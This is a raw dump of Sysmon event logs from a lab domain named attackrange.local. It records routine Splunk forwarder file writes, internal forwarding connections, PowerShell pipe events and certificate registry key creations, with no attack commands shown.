23542300x800000000000000057346628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.423{8B6011A9-BB8A-618B-4CA0-04000000F101}7452NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98Dfalsetrue 11241100x800000000000000057346627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.355{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.355{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B364673DEA29E629FA5CBE6913161A7,SHA256=DE2C19E505E42964F7611439B4BC8C195CB5F4CFDB5ABA763A4C91BBA26C686Cfalsetrue 11241100x800000000000000057346625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53CA5C14C55A68292F1FB15DC4C028A4,SHA256=2977527F8D66FF447C4847BFB0A77EFE9E636FCDF72087D8F2F88D5BD93BCD1Dfalsetrue 11241100x800000000000000057346623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.204{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.203{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A3F896C5B5438CFBFCCCF11DB4D002BC,SHA256=4660738E23F9EDA6A3CBF27F0E04EF696A492C16D56F3ADE327FDA021C13FB61falsetrue 11241100x800000000000000057346621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.124{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.124{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79485753DF10CD36F2885252136137EC,SHA256=3305922143E77727F5A4548057DF638C4292A2B9EBEBA2764BA9EBA6EB815777falsetrue 11241100x800000000000000057346619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.105{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.104{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FD8F7E7495C764CA46E3FB93E8F97423,SHA256=584F6E55F409C348285A94E12CC3EACF05AC64FCFF6B74DB4BAFB9B559B2440Cfalsetrue 11241100x800000000000000057346617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.039{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.039{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3490D7B3E09C87253511BDF39C983593,SHA256=A66FBA4057408E2EA45502BC9CE14155962176F1582B0DC5A7248A4436A6BD34falsetrue 11241100x800000000000000057346615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.004{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.003{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9EA1B46DB4415ECB314DBE6698E96907,SHA256=A922BF4D8B6AFA4521DC2D1F2321BCF504C6F77B8975BB0F672A860608755B02falsetrue 354300x800000000000000057346644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:08.758{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54565-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x800000000000000057346643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.423{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.423{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C0EF555A8B52F5C86B2884739724F86,SHA256=F4E1055997CCE3D2399E217ADBE2B04E7B89743432AA5C1636C128267B0A0275falsetrue 11241100x800000000000000057346641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.385{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.385{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B972E2CE7469549A134EB3400A5814A,SHA256=956FCC959CAEFF5837F2A29020C1352E37D48E2DDD7C46F0FFB333E35366C39Bfalsetrue 11241100x800000000000000057346639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.138{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:37.138{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF52931C754E96C03853F2FF8FDE1F3D,SHA256=5A9B4A859FDC262FED1BF79A388D63FD2372840B8B1BF776389A246ACA3CAE58falsetrue 23542300x800000000000000021219845Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:37.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CF14AC529749B48DE12D0293E7A8F5,SHA256=A11E450DE31257DEF38363C05204F32CBD8DB999D8F46558D4324CB6B7C6FB8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:38.153{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:38.153{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58C019F61F3EA7FC9CFE9F189256880,SHA256=4B308E4E606229A8C162D2209AF88E54DC5D72B5F84FDA02DC4C48616EE534D8falsetrue 23542300x800000000000000021219846Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:38.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEBCC706FAA6496EA7772C840044EA9A,SHA256=624531E72D33BFDD4F58E5E655943AB705E717796FF9DA8C285DEA43BED3C510,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:39.168{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:39.168{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46F1D6D416A48CF4A35E49DA2CB9A3A5,SHA256=4FFDD82A7779132A0D2A57619526EF38441A149B0EA0896F16D2C3D161FE5FF1falsetrue 23542300x800000000000000021219847Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:39.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C903EA2BAF42B18A99DC50D7C7D66DF,SHA256=D9E33179F84CBFF18E9E6AD4F47413B055BE8BCFCB47C29E861FB7D18DD55E83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:40.182{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:40.182{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D57AA7DED17A36BB8F772ADE4BACF2F2,SHA256=EF4E7551B8604E2F836D185A6C5111A4BFA4D386B3AE67EE9F9DA7DB807C3EDCfalsetrue 354300x800000000000000021219851Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:27.440{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64340-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219850Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:40.157{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CD2E2C1DB1F3ABF7B6EB2F0DDC8C14E,SHA256=B225762BBB7CBE027FCDA759F569BE9F7BF2194BA02B0A362378DEBE071BAD74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219849Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:40.032{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18437A320CFC143C3E57B996A8D1A821,SHA256=37B2204BEDD26F216ACFADDAF9C71B211A93D00A17AF80B2EC355CE17E66EB56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219848Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:40.032{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7236881305D927BA9C7B01173DAA322C,SHA256=81AEE691D9CEE8B1C5A6EFAFA8873841A895585245C1345E1A780A3F4311D6D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 18141800x800000000000000057346657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:41.965{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x800000000000000057346656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:41.965{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x800000000000000057346655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:12.451{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54566-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057346654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:41.201{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:41.200{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A89ABE705886E23C39C55F7B89CEDAF2,SHA256=AAE2B24ED366F415EAA0C65B27277441F4F2A07F80FBD4656C5B7550D7627A0Dfalsetrue 23542300x800000000000000021219852Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:41.189{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8F1A9B5B5A9FAD469402F88AEFCCCE,SHA256=66A6087D1DD05E16F972C60263785E0B4942549C6DA3FC75BC8189BAFA1B9A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:41.119{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:41.119{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=150EEECF7C664DE5FB1AE0C32300918A,SHA256=95D6F1E3E15EE24A20C7AB75779968FB567561A8BB9288D62FBBB2ECB28C8F9Efalsetrue 23542300x800000000000000021219853Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:42.189{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0D3990DE55C22B6EFE538D87604EFB2,SHA256=9A5C397AC8545C92272AB1BCF3C187C1418509C96E407682975C69007D0C5525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057346935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.936{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057346934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.833{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.833{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A7AF8749C795E426B01B3CAA85AA3F9A,SHA256=8C1F5EDA3E301E2FC2AFE6B8B53C65C1062005E860AC3735CF6AF20F5EC5FC8Bfalsetrue 12241200x800000000000000057346932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.798{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.798{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.797{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 